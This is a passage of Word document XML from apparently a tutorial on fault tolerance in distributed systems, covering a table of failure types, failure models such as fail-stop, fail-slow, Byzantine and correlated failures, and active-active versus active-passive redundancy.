              <w:t>SMART, ECC, heartbeats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8C57C1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>Occasional</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00476518" w:rsidRPr="00476518" w14:paraId="0227CB6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7E4D94" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>Software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731417" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>Bug, memory leak, deadlock, infinite loop, OOM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D66A5A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>Monitoring, health checks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BB0125" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>Common</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00476518" w:rsidRPr="00476518" w14:paraId="22F490A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B3C60D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>Network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C1B611" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>Partition, packet loss, latency spike, DNS failure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7296C0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>Timeouts, heartbeats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0DFECB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>Common</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00476518" w:rsidRPr="00476518" w14:paraId="01611C8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5F425F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>Operational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820437" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>Misconfiguration, bad deploy, capacity mistake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E87352" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>Canary, tests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9CD341" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>Common</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00476518" w:rsidRPr="00476518" w14:paraId="707B6F3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8F9467" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>Environmental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3CD97B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>Power outage, cooling failure, natural disaster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703382" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>UPS, sensors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74EB81" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>Rare but catastrophic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00476518" w:rsidRPr="00476518" w14:paraId="28DE45E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6618B3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>Byzantine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CE59C7" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>Data corruption, malicious actor, split behavior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56FD77" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>Checksums, consensus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466D5D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
            <w:r w:rsidRPr="00476518">
              <w:t>Very rare (datacenter)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="722D7754" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:pict w14:anchorId="4D4F77B4">
          <v:rect id="_x0000_i6345" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5547BEC3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2. Failure Models — What Can Go Wrong</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6E1263" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.1 Fail-Stop (Crash Failures)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C427BF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3135A4AD" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>A component stops completely and never produces incorrect output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FB55F7" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Server crashes → stops responding entirely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521DCBC2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Process killed by OOM → produces no more messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1EA206" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Network cable cut → no packets at all.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3AA423" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="4AB79207" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Easiest to handle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6A0309" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Clearly detectable (heartbeat timeout → assume dead).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21037113" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - No risk of "bad" output (just absence of output).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C15A2AC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Raft/Paxos assumes this model.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050E5FE1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.2 Fail-Slow (Performance Degradation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1380E17B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5256DBA3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Component doesn't crash but becomes extremely slow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6934DFA4" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Disk approaching failure → I/O latency 100x normal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C749835" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - GC storm → service responds in 30 seconds instead of 30ms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFFE5E0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - CPU throttling → computations take 10x longer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672273D3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Network congestion → packets delayed but not lost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC2615C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="4F1DDBFD" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>HARDER to handle than crash:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478D6362" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Component is technically "alive" (passes basic health checks).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162A84B7" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - But effectively useless (violates latency SLOs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78321959" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Timeouts help but are hard to tune (too short = false positives, too long = prolonged degradation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3503665E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - "Gray failures" — partially working, partially broken.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7AE183" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.3 Byzantine Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2A55BA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12279312" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Component produces ARBITRARY output (including malicious/inconsistent):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1341CC7E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Sends conflicting messages to different peers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4EC507" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Corrupts data silently (no checksum catches it).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE993C8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Claims to be the leader when it's not.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D72B43" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Lies about its state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A36762" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="65C1DD5C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Most difficult to handle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59560C8E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Requires expensive protocols (BFT: 3f+1 nodes for f failures).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552C8045" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Rarely needed in trusted datacenter environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2741CB5B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Relevant for: blockchain, multi-party systems, adversarial environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2223384E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.4 Correlated Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C33BE6F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281D87B6" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>The worst nightmare: multiple components failing simultaneously for the same reason.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEC0D5D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="6DC95DC2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611EC56C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Same software version on all servers → same bug triggered by specific input.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7488BA71" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Same rack → shared power supply fails → all servers in rack die.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6564B5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Same region → AWS us-east-1 outage → all services in that region fail.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D53DB6" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Same dependency → DNS outage → nothing can resolve names → everything fails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AD2D4F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Same configuration push → bad config deployed to all instances simultaneously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B00065" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Same time → leap second bug crashes all servers at the same moment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500C1495" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7E7590" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Mitigation: Diversity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6071028E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Multiple availability zones (different power, network, cooling).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7BFB7E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  - Multiple regions (different physical locations).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316BFEEB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Staggered deployments (not all instances get new code at once).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171F57AA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  - Heterogeneous systems where possible (different vendors, different paths).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2872C384" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:pict w14:anchorId="7CB00815">
          <v:rect id="_x0000_i6346" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C35F9E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Redundancy — The Foundation of Fault Tolerance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433800DF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.1 Types of Redundancy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568647FF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Active-Active (Hot Standby):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7884EB6F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E48ED73" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>All copies process work simultaneously. If one fails, others continue seamlessly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECA0C72" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="584C700B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>┌──────────┐  ┌──────────┐  ┌──────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07732EF1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│ Server 1 │  │ Server 2 │  │ Server 3 │  ← All serving traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DC77F7" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>└──────────┘  └──────────┘  └──────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF32335" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="469A9859" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Load balancer distributes requests across all.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D35DFB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Server 2 dies → LB stops routing to it → Servers 1 &amp; 3 absorb traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC9433E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Failover time: ~0 seconds (immediate — LB detects and routes away).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A25924B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Cost: 3x the resources for 3x redundancy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6A08E2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Active-Passive (Warm/Cold Standby):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E3A470" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C282A77" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>One copy processes work. Others stand ready to take over.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF1DF89" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="19196F7A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>┌──────────┐  ┌──────────┐  ┌──────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD65397" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│ Primary  │  │ Standby  │  │ Standby  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C51B181" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>│ (active) │  │ (warm)   │  │ (cold)   │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45138033" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>└──────────┘  └──────────┘  └──────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1829F24E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="1C4162A5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Warm standby: running, receiving replicated data, ready to promote in seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13721249" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Cold standby: powered off or running but no data — must restore from backup (minutes/hours).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3432CB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Failover time: seconds (warm) to minutes/hours (cold).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8D5908" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Cost: Lower than active-active (standbys don't need full traffic capacity until activated).</w:t>
      </w:r>
    </w:p>
